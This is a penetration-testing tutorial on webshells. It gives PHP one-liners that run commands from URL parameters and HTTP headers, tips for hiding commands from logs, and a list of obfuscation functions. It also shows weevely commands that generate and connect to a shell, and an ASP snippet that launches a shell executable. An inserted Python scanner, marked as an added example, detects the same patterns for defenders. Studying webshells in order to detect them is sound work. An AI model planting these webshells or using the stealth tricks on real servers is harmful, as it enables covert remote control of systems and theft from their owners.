A webshell is a shell that you can access through the web. This is useful when a firewall filters outgoing traffic on ports other than port 80. As long as you have a webserver and want it to function, you can't filter out traffic on port 80 (and 443). It is also a bit more stealthy than a reverse shell on other ports, since the traffic is hidden in the HTTP traffic.
You have access to different kinds of webshells on Kali here:
This code can be injected into pages that use PHP.

    # Execute one command
    system("whoami");

    # Take input from the URL parameter: shell.php?cmd=whoami
    system($_GET['cmd']);

    # The same but using passthru
    passthru($_GET['cmd']);

    # For shell_exec to output the result you need to echo it
    echo shell_exec("whoami");

    # exec() does not output the result without echo, and only outputs the last line. So not very useful!
    echo exec("whoami");

    # Instead do this if you can. It will return the output as an array, and then print it all.
    exec("ls -la", $array);
    print_r($array);

    # preg_replace(). This is a cool trick
    preg_replace('/.*/e', 'system("whoami");', '');

    # Using backticks
    $output = `whoami`;
    echo "<pre>$output</pre>";

    # Using backticks
    echo `whoami`;

You can then execute the commands like this:
Make it stealthy
We can make the commands from above a bit more stealthy. Instead of passing the commands through the URL, which will be obvious in logs, we can pass them through other header parameters. Then use Tamper Data or Burp Suite to insert the commands. Or just netcat or curl.

    system($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    system($_SERVER['HTTP_USER_AGENT']);

    # I have had to use this one
    echo passthru($_SERVER['HTTP_ACCEPT_LANGUAGE']);
The following functions can be used to obfuscate the code.
eval() assert() base64() gzdeflate() str_rot13()
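From the defender's side, the calls and wrappers listed above are what a sweep of the web root should flag. The following Python scanner is an added example, not code from the original page: the rule names, scan() and the sample file are constructed for illustration, and it generalizes the request sources to $_POST, $_REQUEST and $_COOKIE in addition to the $_GET and HTTP_* header values shown here. It works line by line, so calls split across several lines are missed.

```python
import re

# Request-controlled inputs: URL/body/cookie values and HTTP_* header keys.
SOURCE = r"""\$_(?:GET|POST|REQUEST|COOKIE|SERVER\s*\[\s*['"]HTTP_)"""

# Heuristic rules (names are constructed for this example).
RULES = {
    "exec-sink-on-request-input": re.compile(
        r"\b(?:system|passthru|shell_exec|exec)\s*\([^;]*" + SOURCE),
    "backtick-on-request-input": re.compile(r"`[^`]*" + SOURCE + r"[^`]*`"),
    "preg_replace-e-modifier": re.compile(  # assumes '/' as the regex delimiter
        r"""\bpreg_replace\s*\(\s*['"]/.*?/[a-zA-Z]*e[a-zA-Z]*['"]"""),
    # eval()/assert() directly wrapping a decoder such as base64_decode()
    "eval-of-decoded-data": re.compile(
        r"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\("),
}

SAMPLE = r'''<?php
// constructed sample, not from a real site
$page = $_GET['page'];
echo htmlspecialchars($page);
system($_GET['cmd']);
echo passthru($_SERVER['HTTP_ACCEPT_LANGUAGE']);
preg_replace('/.*/e', 'system("whoami");', '');
eval(gzinflate(base64_decode($blob)));
$out = `{$_SERVER['HTTP_USER_AGENT']}`;
exec("ls -la", $array);
'''

def scan(php_source):
    """Return [(line_number, rule_name), ...] for every heuristic hit."""
    hits = []
    for number, line in enumerate(php_source.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((number, name))
    return hits

if __name__ == "__main__":
    for number, name in scan(SAMPLE):
        print(f"line {number}: {name}")
```

Hits are leads for manual review rather than verdicts: legitimate code occasionally matches, and a constant command such as exec("ls -la", $array) is deliberately not flagged.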
Weevely - Incredible tool!
Using weevely we can create PHP webshells easily.
weevely generate password /root/webshell.php
Now we execute it and get a shell in return:
weevely "http://192.168.1.101/webshell.php" password
    <%
    Dim oS
    On Error Resume Next
    Set oS = Server.CreateObject("WSCRIPT.SHELL")
    Call oS.Run("win.com cmd.exe /c c:\Inetpub\shell443.exe",0,True)
    %>